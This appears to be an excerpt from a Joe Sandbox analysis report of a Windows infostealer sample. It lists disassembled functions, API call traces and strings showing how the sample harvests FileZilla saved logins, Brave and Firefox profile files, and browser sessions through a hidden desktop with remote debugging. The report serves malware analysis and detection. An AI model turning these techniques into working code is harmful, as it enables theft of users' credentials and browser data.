                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: dcbc23233a10c5ddd50bea4d9b63efbb1d632f708712ee42dcce5dedd271a3c4
                          • Instruction ID: c37467a376ed92290d66cfe95cdcbf24325093d6f7e51a793f313c9dfe7bd842
                          • Opcode Fuzzy Hash: dcbc23233a10c5ddd50bea4d9b63efbb1d632f708712ee42dcce5dedd271a3c4
                          • Instruction Fuzzy Hash: 03525371A25716DBDB21EFA8DC8DA9E77F9AF44300F044624F805A7291DB78EC468F90
                          Function 007060D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007060FF
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00706152
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00706185
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007061B5
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007061F0
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00706223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00706233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: 48df1ff8d3e5c6ff511ca58cd3a76046c7e347c987a9db59e746112c45a6dece
                          • Instruction ID: f28df97ebb6465c10189c3f8bfba34992ccbc8090d5957031ed0af6db475130a
                          • Opcode Fuzzy Hash: 48df1ff8d3e5c6ff511ca58cd3a76046c7e347c987a9db59e746112c45a6dece
                          • Instruction Fuzzy Hash: 58521072A14215DBDB21EBA8DC5DA9E77F9AF44300F148624F805F7292DB78ED06CB90
                          Function 00716B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716B9D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716BCD
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716BFD
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00716C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00716C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00716C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00716C5A
                          • lstrlen.KERNEL32(00000000), ref: 00716C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00716CE2
                          • lstrlen.KERNEL32(00000000), ref: 00716CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00716D6A
                          • lstrlen.KERNEL32(00000000), ref: 00716D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00716DF2
                          • lstrlen.KERNEL32(00000000), ref: 00716E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00716E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00716E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00716EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00716EC9
                          • LocalFree.KERNEL32(00000000), ref: 00716ED4
                          • lstrlen.KERNEL32(?), ref: 00716F6E
                          • lstrlen.KERNEL32(?), ref: 00716F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: bcf11b7d65bc75e4e92497823fad2d5791750de39a820f0fed56cca868185843
                          • Instruction ID: 7da8e0f04e2998fdb68a874fa7e05f8d4a67597f0e903947b333d75d8bd90f86
                          • Opcode Fuzzy Hash: bcf11b7d65bc75e4e92497823fad2d5791750de39a820f0fed56cca868185843
                          • Instruction Fuzzy Hash: 50029471A29215EBCB11ABB8DD8DB9E7BB9AF04700F144514F801E7292DF7CD942DBA0
                          Function 00714B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00714B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00714B7F
                          • lstrlen.KERNEL32(00734CA8), ref: 00714B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714BA7
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 00714BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00714BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00714BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: 491a9bd6444b57782d537a3a2d84157028b2afcc9398d7f90c7809f96a8473db
                          • Instruction ID: 74e6981ad8cdcf37a8c0c9fba3e605f36e2dd0212e43ef92d951be3bee5e3d91
                          • Opcode Fuzzy Hash: 491a9bd6444b57782d537a3a2d84157028b2afcc9398d7f90c7809f96a8473db
                          • Instruction Fuzzy Hash: C9926071A15601CFDB28CF6CC988B99B7E5AF84714F19816DE8099B2E1D779DC82CF80
                          Function 00711250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00711291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007112B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007112BF
                          • lstrlen.KERNEL32(00734CA8), ref: 007112CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007112E7
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 007112F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0071133A
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071135C
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00711376
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007113AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 007113D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007113E2
                          • lstrlen.KERNEL32(00731794), ref: 007113ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071140A
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00711416
                          • lstrlen.KERNEL32(?), ref: 00711423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711443
                          • lstrcat.KERNEL32(00000000,?), ref: 00711451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071147A
                          • StrCmpCA.SHLWAPI(?,010DCC38), ref: 007114A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007114E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711535
                          • StrCmpCA.SHLWAPI(?,010DD228), ref: 00711552
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711593
                          • lstrcpy.KERNEL32(00000000,?), ref: 007115BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007115E4
                          • StrCmpCA.SHLWAPI(?,010DCED8), ref: 00711602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711633
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711685
                          • StrCmpCA.SHLWAPI(?,010DCDD0), ref: 007116B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 007116F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00711745
                          • lstrcpy.KERNEL32(00000000,?), ref: 00711796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007117BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 007117F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0071181C
                          • FindClose.KERNEL32(00000000), ref: 0071182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 6675cd50fa0df0d6b9595f36187f9d5f0b9793696af024e4863c1e42e67bdae3
                          • Instruction ID: bfc8f712363e6bd50bb0d02bf16634d2350a365372676b6c49821e09377b6437
                          • Opcode Fuzzy Hash: 6675cd50fa0df0d6b9595f36187f9d5f0b9793696af024e4863c1e42e67bdae3
                          • Instruction Fuzzy Hash: A7125371625206DBCB25EF78D88DAAE77F8AF44300F444528F946A7291DF38DC458B90
                          Function 0071CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0071CBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 0071CC13
                          • lstrcat.KERNEL32(?,?), ref: 0071CC5F
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0071CC71
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0071CC8B
                          • wsprintfA.USER32 ref: 0071CCB0
                          • PathMatchSpecA.SHLWAPI(?,010D88B0), ref: 0071CCE2
                          • CoInitialize.OLE32(00000000), ref: 0071CCEE
                            • Part of subcall function 0071CAE0: CoCreateInstance.COMBASE(0072B110,00000000,00000001,0072B100,?), ref: 0071CB06
                            • Part of subcall function 0071CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0071CB46
                            • Part of subcall function 0071CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0071CBC9
                          • CoUninitialize.COMBASE ref: 0071CD09
                          • lstrcat.KERNEL32(?,?), ref: 0071CD2E
                          • lstrlen.KERNEL32(?), ref: 0071CD3B
                          • StrCmpCA.SHLWAPI(?,0072CFEC), ref: 0071CD55
                          • wsprintfA.USER32 ref: 0071CD7D
                          • wsprintfA.USER32 ref: 0071CD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0071CDB0
                          • wsprintfA.USER32 ref: 0071CDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0071CDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0071CE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 0071CE28
                          • CloseHandle.KERNEL32(00000000), ref: 0071CE33
                          • CloseHandle.KERNEL32(00000000), ref: 0071CE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0071CE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071CE94
                          • FindNextFileA.KERNEL32(?,?), ref: 0071CF8D
                          • FindClose.KERNEL32(?), ref: 0071CF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: 9336a0407e9c63b2a91900ae8b5bbc32de44c86b2f54f685937ac5915c7be21b
                          • Instruction ID: 921a26858742aab2c582a96c28adc2d3724f9c754d850f4729e29aac95251ee2
                          • Opcode Fuzzy Hash: 9336a0407e9c63b2a91900ae8b5bbc32de44c86b2f54f685937ac5915c7be21b
                          • Instruction Fuzzy Hash: FAC16172A10219DFDB25DFA8DC49AEF77B9BF44700F044598F909A7281DE34AA85CF90
                          Function 00709770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00709790
                          • lstrcat.KERNEL32(?,?), ref: 007097A0
                          • lstrcat.KERNEL32(?,?), ref: 007097B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 007097C3
                          • memset.MSVCRT ref: 007097D7
                            • Part of subcall function 00723E70: lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00723EA5
                            • Part of subcall function 00723E70: lstrcpy.KERNEL32(00000000,010D9D78), ref: 00723ECF
                            • Part of subcall function 00723E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0070134E,?,0000001A), ref: 00723ED9
                          • wsprintfA.USER32 ref: 00709806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00709827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00709844
                            • Part of subcall function 007246A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007246B9
                            • Part of subcall function 007246A0: Process32First.KERNEL32(00000000,00000128), ref: 007246C9
                            • Part of subcall function 007246A0: Process32Next.KERNEL32(00000000,00000128), ref: 007246DB
                            • Part of subcall function 007246A0: StrCmpCA.SHLWAPI(?,?), ref: 007246ED
                            • Part of subcall function 007246A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00724702
                            • Part of subcall function 007246A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00724711
                            • Part of subcall function 007246A0: CloseHandle.KERNEL32(00000000), ref: 00724718
                            • Part of subcall function 007246A0: Process32Next.KERNEL32(00000000,00000128), ref: 00724726
                            • Part of subcall function 007246A0: CloseHandle.KERNEL32(00000000), ref: 00724731
                          • memset.MSVCRT ref: 00709862
                          • lstrcat.KERNEL32(00000000,?), ref: 00709878
                          • lstrcat.KERNEL32(00000000,?), ref: 00709889
                          • lstrcat.KERNEL32(00000000,00734B60), ref: 0070989B
                          • memset.MSVCRT ref: 007098AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 007098D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00709903
                          • StrStrA.SHLWAPI(00000000,010DDA08), ref: 00709919
                          • lstrcpyn.KERNEL32(009393D0,00000000,00000000), ref: 00709938
                          • lstrlen.KERNEL32(?), ref: 0070994B
                          • wsprintfA.USER32 ref: 0070995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 00709971
                          • memset.MSVCRT ref: 00709986
                          • Sleep.KERNEL32(00001388), ref: 007099E7
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701557
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 00701579
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 0070159B
                            • Part of subcall function 00701530: lstrcpy.KERNEL32(00000000,?), ref: 007015FF
                            • Part of subcall function 007092B0: strlen.MSVCRT ref: 007092E1
                            • Part of subcall function 007092B0: strlen.MSVCRT ref: 007092FA
                            • Part of subcall function 007092B0: strlen.MSVCRT ref: 00709399
                            • Part of subcall function 007092B0: strlen.MSVCRT ref: 007093E6
                            • Part of subcall function 00724740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00724759
                            • Part of subcall function 00724740: Process32First.KERNEL32(00000000,00000128), ref: 00724769
                            • Part of subcall function 00724740: Process32Next.KERNEL32(00000000,00000128), ref: 0072477B
                            • Part of subcall function 00724740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072479C
                            • Part of subcall function 00724740: TerminateProcess.KERNEL32(00000000,00000000), ref: 007247AB
                            • Part of subcall function 00724740: CloseHandle.KERNEL32(00000000), ref: 007247B2
                            • Part of subcall function 00724740: Process32Next.KERNEL32(00000000,00000128), ref: 007247C0
                            • Part of subcall function 00724740: CloseHandle.KERNEL32(00000000), ref: 007247CB
                          • CloseDesktop.USER32(?), ref: 00709A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
